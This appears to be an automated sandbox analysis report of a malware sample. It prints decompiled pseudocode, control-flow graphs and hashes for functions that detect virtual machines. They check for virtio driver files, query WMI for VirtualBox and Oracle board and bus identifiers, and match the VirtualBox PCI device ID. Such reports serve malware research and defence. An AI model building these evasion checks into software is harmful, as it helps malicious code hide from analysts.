                • Instruction ID: ff0f3d197c49f81bd0b4e78d58898ac4a19484dec45c3f4490977bf43da8862b
                • Opcode Fuzzy Hash: 683a3aaf5bad5a9c9ead025d1d331b348d13d01f0072b0bfa3293400a34c3393
                • Instruction Fuzzy Hash: 0A51067A312F6486EB10CF65E89869C77A0F748F98F449116EE5E53B68DF38C548CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809F410 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 125COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1175 285c809f410-285c809f4fd call 285c80c8ef0 * 2 GetWindowsDirectoryW call 285c80a00a0 1182 285c809f4ff-285c809f504 Wow64DisableWow64FsRedirection 1175->1182 1183 285c809f50a-285c809f50f 1175->1183 1182->1183 1184 285c809f510-285c809f563 PathCombineW call 285c80c8ef0 call 285c809d1d0 GetFileAttributesW 1183->1184 1189 285c809f565-285c809f567 1184->1189 1190 285c809f569-285c809f570 1184->1190 1189->1190 1191 285c809f574 1189->1191 1190->1184 1192 285c809f572 1190->1192 1193 285c809f579-285c809f589 1191->1193 1192->1193 1194 285c809f590-285c809f593 1193->1194 1195 285c809f5a2-285c809f5b1 1194->1195 1196 285c809f595-285c809f59e 1194->1196 1197 285c809f5b3-285c809f5b5 1195->1197 1198 285c809f601-285c809f62a call 285c80c59d0 1195->1198 1196->1194 1199 285c809f5a0 1196->1199 1200 285c809f5b8-285c809f5bb 1197->1200 1199->1198 1202 285c809f5bd-285c809f5c6 1200->1202 1203 285c809f5ca-285c809f5d8 1200->1203 1202->1200 1205 285c809f5c8 1202->1205 1206 285c809f5df-285c809f5f4 GetCurrentProcess 1203->1206 1207 285c809f5da 1203->1207 1205->1206 1206->1198 1209 285c809f5f6-285c809f5fb Wow64RevertWow64FsRedirection 1206->1209 1207->1206 1209->1198
                C-Code - Quality: 55%
                			E00000285285C809F410(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
				signed char _t60;
				void* _t76;
				void* _t80;
				signed long long _t93;
				signed long long _t107;
				void* _t128;
				signed long long _t133;
				WCHAR* _t138;
				void* _t141;
				signed long long _t142;
				void* _t144;

				_t133 = __rdi;
				_t68 = __ecx;
				 *((long long*)(_t141 + 8)) = __rbx;
				 *((long long*)(_t141 + 0x10)) = __rsi;
				 *((long long*)(_t141 + 0x18)) = __rdi;
				_t139 = _t141 - 0x5b0;
				_t142 = _t141 - 0x6b0;
				_t93 =  *0xc814c720; // 0xee50a592130
				 *(_t141 - 0x5b0 + 0x5a0) = _t93 ^ _t142;
				 *((long long*)(_t142 + 0x30)) = L"System32\\drivers\\balloon.sys";
				r8d = 0x208;
				 *((long long*)(_t142 + 0x38)) = L"System32\\drivers\\netkvm.sys";
				 *((long long*)(_t142 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
				 *((long long*)(_t142 + 0x48)) = L"System32\\drivers\\viofs.sys";
				 *((long long*)(_t142 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
				 *((long long*)(_t142 + 0x58)) = L"System32\\drivers\\vioinput.sys";
				 *((long long*)(_t142 + 0x60)) = L"System32\\drivers\\viorng.sys";
				 *((long long*)(_t142 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
				 *((long long*)(_t142 + 0x70)) = L"System32\\drivers\\vioser.sys";
				 *((long long*)(_t142 + 0x78)) = L"System32\\drivers\\viostor.sys";
				E00000285285C80C8EF0(__ecx, 0, _t76, _t80, _t141 - 0x5b0 + 0x190, _t128, __rdi, _t144);
				r8d = 0x208;
				E00000285285C80C8EF0(_t68, 0, _t76, _t80, _t139 - 0x80, _t128, _t133, _t144);
				 *(_t142 + 0x28) = _t133;
				GetWindowsDirectoryW(_t138);
				if (E00000285285C80A00A0() == 0) goto 0xc809f50a;
				__imp__Wow64DisableWow64FsRedirection();
				_t107 = _t133;
				__imp__PathCombineW();
				r8d = 0x200;
				E00000285285C80C8EF0(_t68, 0, 0, _t80, _t139 + 0x3a0, _t139 + 0x190, _t133,  *((intOrPtr*)(_t142 + 0x30 + _t107 * 8)));
				E00000285285C809D1D0(_t68, L"System32\\drivers\\viostor.sys", _t139 + 0x3a0, _t139 + 0x190, L"Checking file %s ", _t139 - 0x80);
				_t60 = GetFileAttributesW(??); // executed
				if (_t60 == 0xffffffff) goto 0xc809f569;
				if ((_t60 & 0x00000010) == 0) goto 0xc809f574;
				if (_t107 + 1 - 0xa < 0) goto 0xc809f510;
				goto 0xc809f579;
				 *((intOrPtr*)(_t142 + 0x20)) = 0;
				if ( *0xc814e430 == 8) goto 0xc809f5a2;
				if (1 - 0x1e < 0) goto 0xc809f590;
				goto 0xc809f601;
				if ( *0x285C814E484 == dil) goto 0xc809f601;
				if ( *0xc814e430 == 8) goto 0xc809f5ca;
				if (1 - 0x1e < 0) goto 0xc809f5b8;
				goto 0xc809f5df;
				if ( *0x285C814E46C == dil) goto 0xc809f5df;
				GetCurrentProcess();
				 *((long long*)( *0x285C814E488))();
				if ( *((intOrPtr*)(_t142 + 0x20)) == 0) goto 0xc809f601;
				__imp__Wow64RevertWow64FsRedirection();
				return E00000285285C80C59D0(1,  *(_t139 + 0x5a0) ^ _t142, _t142 + 0x20, _t139 - 0x80);
			}














                0x285c809f410
                0x285c809f410
                0x285c809f410
                0x285c809f415
                0x285c809f41a
                0x285c809f420
                0x285c809f428
                0x285c809f42f
                0x285c809f439
                0x285c809f449
                0x285c809f45c
                0x285c809f462
                0x285c809f46e
                0x285c809f47a
                0x285c809f486
                0x285c809f492
                0x285c809f49e
                0x285c809f4aa
                0x285c809f4b6
                0x285c809f4c2
                0x285c809f4c7
                0x285c809f4d2
                0x285c809f4d8
                0x285c809f4eb
                0x285c809f4f0
                0x285c809f4fd
                0x285c809f504
                0x285c809f50c
                0x285c809f520
                0x285c809f52f
                0x285c809f535
                0x285c809f551
                0x285c809f55a
                0x285c809f563
                0x285c809f567
                0x285c809f570
                0x285c809f572
                0x285c809f580
                0x285c809f593
                0x285c809f59e
                0x285c809f5a0
                0x285c809f5b1
                0x285c809f5bb
                0x285c809f5c6
                0x285c809f5c8
                0x285c809f5d8
                0x285c809f5df
                0x285c809f5ed
                0x285c809f5f4
                0x285c809f5fb
                0x285c809f62a

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                • API String ID: 2137468328-3181514389
                • Opcode ID: da6447d01ef5b2ade75ee0643974bd2b849857eb3f01f09764cc032b8923eaac
                • Instruction ID: 9ce26ba39f4044ef51a0ce26acdeb3b6465e753e9d166d713eaa5d3c44d3bdbb
                • Opcode Fuzzy Hash: da6447d01ef5b2ade75ee0643974bd2b849857eb3f01f09764cc032b8923eaac
                • Instruction Fuzzy Hash: 47517C3A212FA095EB20CF14E8482DE77E5F789794F949223DA9D527A4EF3CC545CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809E7D0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 166memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1210 285c809e7d0-285c809e802 call 285c80a0410 1213 285c809ea47-285c809ea54 1210->1213 1214 285c809e808-285c809e84e SysAllocString * 2 1210->1214 1215 285c809e850-285c809e853 1214->1215 1216 285c809e8a5-285c809e8b0 1214->1216 1219 285c809e855-285c809e871 1215->1219 1220 285c809e89c-285c809e89f SysFreeString 1215->1220 1217 285c809e8b2-285c809e8b5 SysFreeString 1216->1217 1218 285c809e8bb-285c809e8cb 1216->1218 1217->1218 1221 285c809ea34-285c809ea46 1218->1221 1222 285c809e8d1-285c809e8f6 1218->1222 1225 285c809e87b-285c809e87d 1219->1225 1220->1216 1223 285c809ea14-285c809ea2e CoUninitialize 1222->1223 1224 285c809e8fc 1222->1224 1223->1221 1226 285c809e900-285c809e91d 1224->1226 1225->1220 1227 285c809e87f-285c809e896 CoUninitialize 1225->1227 1232 285c809ea10 1226->1232 1233 285c809e923-285c809e93f 1226->1233 1227->1220 1232->1223 1236 285c809e945-285c809e947 1233->1236 1237 285c809e977-285c809e9c3 1236->1237 1238 285c809e949-285c809e94e 1236->1238 1244 285c809e9f3-285c809e9ff 1237->1244 1245 285c809e9c5-285c809e9ca 1237->1245 1238->1237 1239 285c809e950-285c809e954 1238->1239 1240 285c809e96d-285c809e971 VariantClear 1239->1240 1241 285c809e956-285c809e969 call 285c80c9740 1239->1241 1240->1237 1241->1240 1244->1232 1251 285c809ea01-285c809ea08 1244->1251 1245->1244 1247 285c809e9cc-285c809e9d0 1245->1247 1248 285c809e9d2-285c809e9e5 call 285c80c9740 1247->1248 1249 285c809e9e9-285c809e9ed VariantClear 1247->1249 1248->1249 1249->1244 1251->1226 1253 285c809ea0e 1251->1253 1253->1223
                C-Code - Quality: 16%
                			E00000285285C809E7D0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
				void* __rbx;
				void* _t74;
				void* _t75;
				void* _t93;
				long long _t117;
				long long _t119;
				void* _t122;
				intOrPtr* _t131;
				long long _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t168;
				long long _t173;

				_t156 = __rsi;
				_t159 = _t160 - 0x47;
				_t161 = _t160 - 0x90;
				r15d = 0;
				 *((long long*)(_t159 + 0x7f)) = _t173;
				 *((long long*)(_t159 - 0x19)) = _t173;
				 *((long long*)(_t159 + 0x77)) = _t173;
				_t75 = E00000285285C80A0410(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
				if (_t75 == 0) goto 0xc809ea47;
				 *((long long*)(_t161 + 0x88)) = _t156;
				 *((long long*)(_t161 + 0x80)) = __rdi;
				 *((long long*)(_t161 + 0x78)) = __r12;
				 *((long long*)(_t161 + 0x70)) = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xc809e8a5;
				if (__rax == 0) goto 0xc809e89c;
				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
				_t14 = _t173 + 0x30; // 0x30
				r9d = _t14;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0xc809e89c;
				r14d = r15d;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
				 *((intOrPtr*)(_t117 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xc809e8bb;
				__imp__#6();
				if (r14d == 0) goto 0xc809ea34;
				_t131 =  *((intOrPtr*)(_t159 + 0x77));
				 *((long long*)(_t159 + 0x6f)) = _t173;
				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
				 *(_t159 - 0x11) = r15w;
				 *((long long*)(_t159 - 0xf)) = _t117;
				 *((long long*)(_t159 - 7)) = _t117;
				 *((intOrPtr*)(_t159 + 1)) = 0;
				 *((short*)(_t159 + 5)) = 0;
				if (_t131 == 0) goto 0xc809ea14;
				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t131 + 0x20))();
				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0xc809ea10;
				 *((long long*)(_t161 + 0x28)) = _t173;
				r8d = 0;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
				 *((intOrPtr*)(_t119 + 0x20))();
				if (0 < 0) goto 0xc809e977;
				if ( *(_t159 - 0x11) == r12w) goto 0xc809e977;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xc809e96d;
				E00000285285C80C9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				 *(_t159 + 7) = r15w;
				 *((long long*)(_t159 + 0x11)) = _t119;
				 *((long long*)(_t159 + 9)) = _t119;
				r8d = 0;
				asm("movups xmm0, [ebp+0x7]");
				 *((intOrPtr*)(_t159 + 0x19)) = 0;
				 *((short*)(_t159 + 0x1d)) = 0;
				asm("movsd xmm1, [ebp+0x17]");
				asm("movups [ebp-0x11], xmm0");
				 *((long long*)(_t161 + 0x28)) = _t173;
				asm("movsd [ebp-0x1], xmm1");
				 *((long long*)(_t161 + 0x20)) = _t173;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
				if (0 < 0) goto 0xc809e9f3;
				if ( *(_t159 - 0x11) == r12w) goto 0xc809e9f3;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xc809e9e9;
				E00000285285C80C9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
				if (_t93 != 0) goto 0xc809ea10;
				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0xc809e900;
				goto 0xc809ea14;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t93;
			}

















                0x285c809e7d0
                0x285c809e7d5
                0x285c809e7da
                0x285c809e7e1
                0x285c809e7ec
                0x285c809e7f0
                0x285c809e7f7
                0x285c809e7fb
                0x285c809e802
                0x285c809e808
                0x285c809e817
                0x285c809e81f
                0x285c809e824
                0x285c809e829
                0x285c809e839
                0x285c809e83f
                0x285c809e848
                0x285c809e84e
                0x285c809e853
                0x285c809e85d
                0x285c809e862
                0x285c809e862
                0x285c809e869
                0x285c809e871
                0x285c809e87d
                0x285c809e883
                0x285c809e889
                0x285c809e890
                0x285c809e893
                0x285c809e896
                0x285c809e89f
                0x285c809e8b0
                0x285c809e8b5
                0x285c809e8cb
                0x285c809e8d1
                0x285c809e8d7
                0x285c809e8db
                0x285c809e8df
                0x285c809e8e4
                0x285c809e8e8
                0x285c809e8ec
                0x285c809e8ef
                0x285c809e8f6
                0x285c809e907
                0x285c809e913
                0x285c809e916
                0x285c809e91d
                0x285c809e92b
                0x285c809e937
                0x285c809e93a
                0x285c809e93f
                0x285c809e942
                0x285c809e947
                0x285c809e94e
                0x285c809e954
                0x285c809e961
                0x285c809e969
                0x285c809e971
                0x285c809e981
                0x285c809e986
                0x285c809e991
                0x285c809e995
                0x285c809e998
                0x285c809e99c
                0x285c809e99f
                0x285c809e9a3
                0x285c809e9a8
                0x285c809e9ac
                0x285c809e9b1
                0x285c809e9b9
                0x285c809e9be
                0x285c809e9c3
                0x285c809e9ca
                0x285c809e9d0
                0x285c809e9dd
                0x285c809e9e5
                0x285c809e9ed
                0x285c809e9fa
                0x285c809e9ff
                0x285c809ea08
                0x285c809ea0e
                0x285c809ea17
                0x285c809ea21
                0x285c809ea2b
                0x285c809ea2e
                0x285c809ea46

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                • API String ID: 1018877641-1142199694
                • Opcode ID: 60b8ea03e04fce65a111e3a6f6c4d750f021f66cb18c76577025c873ab81917a
                • Instruction ID: 866d3dcabce68ccf9e3543e1960a6dd0c1e0ebc3b80736f888969640da3a13e3
                • Opcode Fuzzy Hash: 60b8ea03e04fce65a111e3a6f6c4d750f021f66cb18c76577025c873ab81917a
                • Instruction Fuzzy Hash: 5C81203A606F50CAEB50CF69E8583AD33E4FB84B88F4085169E5D67A68DF38C559CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809E5C0 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 142memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1255 285c809e5c0-285c809e5e7 call 285c80a0410 1258 285c809e5ed-285c809e62d SysAllocString * 2 1255->1258 1259 285c809e7c3-285c809e7cb 1255->1259 1260 285c809e62f-285c809e632 1258->1260 1261 285c809e684-285c809e687 1258->1261 1262 285c809e634-285c809e650 1260->1262 1263 285c809e67b-285c809e67e SysFreeString 1260->1263 1264 285c809e692-285c809e69a 1261->1264 1265 285c809e689-285c809e68c SysFreeString 1261->1265 1270 285c809e65a-285c809e65c 1262->1270 1263->1261 1266 285c809e6a0-285c809e6b2 1264->1266 1267 285c809e7ab-285c809e7c2 1264->1267 1265->1264 1268 285c809e6b8 1266->1268 1269 285c809e78b-285c809e7a5 CoUninitialize 1266->1269 1271 285c809e6c0-285c809e6dc 1268->1271 1269->1267 1270->1263 1272 285c809e65e-285c809e675 CoUninitialize 1270->1272 1276 285c809e6e2-285c809e700 1271->1276 1277 285c809e77c 1271->1277 1272->1263 1282 285c809e706-285c809e708 1276->1282 1279 285c809e780-285c809e783 1277->1279 1279->1269 1283 285c809e785-285c809e787 1279->1283 1284 285c809e763-285c809e774 1282->1284 1285 285c809e70a-285c809e712 1282->1285 1283->1269 1284->1271 1290 285c809e77a 1284->1290 1285->1284 1286 285c809e714-285c809e716 1285->1286 1288 285c809e718-285c809e72b call 285c80c9740 1286->1288 1289 285c809e759-285c809e75d VariantClear 1286->1289 1293 285c809e72d-285c809e740 call 285c80c9740 1288->1293 1294 285c809e757 1288->1294 1289->1284 1290->1279 1293->1294 1297 285c809e742-285c809e755 call 285c80c9740 1293->1297 1294->1289 1297->1289 1297->1294
                C-Code - Quality: 26%
                			E00000285285C809E5C0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t99;
				intOrPtr* _t112;
				long long _t133;
				long long _t134;
				void* _t145;

				_t134 = __rsi;
				_a24 = _t133;
				_v88 = _t133;
				_a16 = _t133;
				_t54 = E00000285285C80A0410(_t53,  &_a24,  &_v88, __rsi); // executed
				if (_t54 == 0) goto 0xc809e7c3;
				_v24 = __rbx;
				_v32 = _t134;
				_v40 = __r14;
				_v48 = __r15;
				__imp__#2();
				_t135 = __rax;
				__imp__#2();
				r15d = 1;
				_t102 = __rax;
				r14d = r15d;
				if (__rax == 0) goto 0xc809e684;
				if (__rax == 0) goto 0xc809e67b;
				_v96 =  &_a16;
				_t13 = _t133 + 0x30; // 0x31
				r9d = _t13;
				_v104 = _t133;
				_t144 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xc809e67b;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xc809e692;
				__imp__#6();
				if (r14d == 0) goto 0xc809e7ab;
				_t112 = _a16;
				_a32 = _t133;
				_a8 = 0;
				if (_t112 == 0) goto 0xc809e78b;
				_v104 =  &_a8;
				r8d = r15d; // executed
				 *((intOrPtr*)( *_t112 + 0x20))();
				if (_a8 == 0) goto 0xc809e77c;
				_v96 = _t133;
				r8d = 0;
				_v104 = _t133;
				_t99 =  *_a32; // executed
				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0xc809e763;
				_t60 = _v80 & 0x0000ffff;
				if (_t60 == r15w) goto 0xc809e763;
				if ((_t60 & 0x00000008) == 0) goto 0xc809e759;
				E00000285285C80C9740(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
				if (_t99 != 0) goto 0xc809e757;
				E00000285285C80C9740(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
				if (_t99 != 0) goto 0xc809e757;
				E00000285285C80C9740(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
				if (_t99 == 0) goto 0xc809e759;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0xc809e6c0;
				goto 0xc809e780;
				if (1 != 3) goto 0xc809e78b;
				_t74 =  ==  ? r15d : 0;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				_t68 =  ==  ? r15d : 0;
				return  ==  ? r15d : 0;
			}




















                0x285c809e5c0
                0x285c809e5d4
                0x285c809e5d8
                0x285c809e5dc
                0x285c809e5e0
                0x285c809e5e7
                0x285c809e5ed
                0x285c809e5f9
                0x285c809e5fe
                0x285c809e603
                0x285c809e608
                0x285c809e615
                0x285c809e618
                0x285c809e61e
                0x285c809e624
                0x285c809e627
                0x285c809e62d
                0x285c809e632
                0x285c809e63c
                0x285c809e641
                0x285c809e641
                0x285c809e648
                0x285c809e650
                0x285c809e65c
                0x285c809e662
                0x285c809e668
                0x285c809e672
                0x285c809e675
                0x285c809e67e
                0x285c809e687
                0x285c809e68c
                0x285c809e69a
                0x285c809e6a0
                0x285c809e6a6
                0x285c809e6ac
                0x285c809e6b2
                0x285c809e6c7
                0x285c809e6d3
                0x285c809e6d6
                0x285c809e6dc
                0x285c809e6ea
                0x285c809e6f6
                0x285c809e6f9
                0x285c809e700
                0x285c809e708
                0x285c809e70a
                0x285c809e712
                0x285c809e716
                0x285c809e723
                0x285c809e72b
                0x285c809e738
                0x285c809e740
                0x285c809e74d
                0x285c809e755
                0x285c809e75d
                0x285c809e76a
                0x285c809e774
                0x285c809e77a
                0x285c809e783
                0x285c809e787
                0x285c809e78e
                0x285c809e798
                0x285c809e7a2
                0x285c809e7a5
                0x285c809e7b0
                0x285c809e7c2

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                • API String ID: 2365594256-2399075642
                • Opcode ID: 7e007c52e842b73164768ccf955c41c27e330a4540f0ea4145b43c5dc9dcff79
                • Instruction ID: 4a956898d620949c28e943cccd97fb3c94f9dab7ca9c712a5ba5c4d2cfb28160
                • Opcode Fuzzy Hash: 7e007c52e842b73164768ccf955c41c27e330a4540f0ea4145b43c5dc9dcff79
                • Instruction Fuzzy Hash: 59513D3A302F6086EB108F25D88869C77A4F788FD8F148116EE5E57B64DF78C955CB41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809E1C0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 133memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1300 285c809e1c0-285c809e1ed call 285c80a0410 1303 285c809e1f3-285c809e233 SysAllocString * 2 1300->1303 1304 285c809e38c-285c809e396 1300->1304 1305 285c809e235-285c809e238 1303->1305 1306 285c809e28a-285c809e292 1303->1306 1307 285c809e281-285c809e284 SysFreeString 1305->1307 1308 285c809e23a-285c809e256 1305->1308 1309 285c809e29d-285c809e2aa 1306->1309 1310 285c809e294-285c809e297 SysFreeString 1306->1310 1307->1306 1315 285c809e260-285c809e262 1308->1315 1311 285c809e2b0-285c809e2bf 1309->1311 1312 285c809e37c-285c809e38b 1309->1312 1310->1309 1313 285c809e358-285c809e376 CoUninitialize 1311->1313 1314 285c809e2c5-285c809e2cf 1311->1314 1313->1312 1316 285c809e2d0-285c809e2ed 1314->1316 1315->1307 1317 285c809e264-285c809e27b CoUninitialize 1315->1317 1316->1313 1322 285c809e2ef-285c809e30b 1316->1322 1317->1307 1325 285c809e311-285c809e313 1322->1325 1326 285c809e33d-285c809e349 1325->1326 1327 285c809e315-285c809e31a 1325->1327 1326->1313 1332 285c809e34b-285c809e352 1326->1332 1328 285c809e333-285c809e337 VariantClear 1327->1328 1329 285c809e31c-285c809e32f call 285c80c9740 1327->1329 1328->1326 1329->1328 1332->1313 1332->1316
                C-Code - Quality: 20%
                			E00000285285C809E1C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t49;
				void* _t50;
				void* _t63;
				void* _t86;
				intOrPtr* _t95;
				long long _t115;
				void* _t126;
				long long _t131;

				_t115 = __rsi;
				r15d = 0;
				_a16 = _t131;
				_v88 = _t131;
				_a24 = _t131;
				_t50 = E00000285285C80A0410(_t49,  &_a16,  &_v88, __rsi); // executed
				if (_t50 == 0) goto 0xc809e38c;
				_v32 = _t115;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xc809e28a;
				if (__rax == 0) goto 0xc809e281;
				_v96 =  &_a24;
				_t13 = _t131 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0xc809e281;
				r14d = r15d;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xc809e29d;
				__imp__#6();
				if (r14d == 0) goto 0xc809e37c;
				_t95 = _a24;
				_a32 = _t131;
				_a8 = r15d;
				if (_t95 == 0) goto 0xc809e358;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t95 + 0x20))();
				if (_a8 == r15d) goto 0xc809e358;
				_v96 = _t131;
				r8d = 0;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xc809e33d;
				if (_v80 != 8) goto 0xc809e333;
				E00000285285C80C9740(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
				_t63 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t63 != 0) goto 0xc809e358;
				if (_a24 != 0) goto 0xc809e2d0;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t63;
			}





















                0x285c809e1c0
                0x285c809e1cc
                0x285c809e1d7
                0x285c809e1db
                0x285c809e1e2
                0x285c809e1e6
                0x285c809e1ed
                0x285c809e1f3
                0x285c809e1ff
                0x285c809e204
                0x285c809e209
                0x285c809e20e
                0x285c809e21e
                0x285c809e224
                0x285c809e22d
                0x285c809e233
                0x285c809e238
                0x285c809e242
                0x285c809e247
                0x285c809e247
                0x285c809e24e
                0x285c809e262
                0x285c809e268
                0x285c809e26e
                0x285c809e278
                0x285c809e27b
                0x285c809e284
                0x285c809e292
                0x285c809e297
                0x285c809e2aa
                0x285c809e2b0
                0x285c809e2b4
                0x285c809e2b8
                0x285c809e2bf
                0x285c809e2c5
                0x285c809e2d7
                0x285c809e2e3
                0x285c809e2e6
                0x285c809e2ed
                0x285c809e2f7
                0x285c809e303
                0x285c809e306
                0x285c809e313
                0x285c809e31a
                0x285c809e327
                0x285c809e32f
                0x285c809e337
                0x285c809e344
                0x285c809e349
                0x285c809e352
                0x285c809e35f
                0x285c809e369
                0x285c809e373
                0x285c809e376
                0x285c809e38b

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
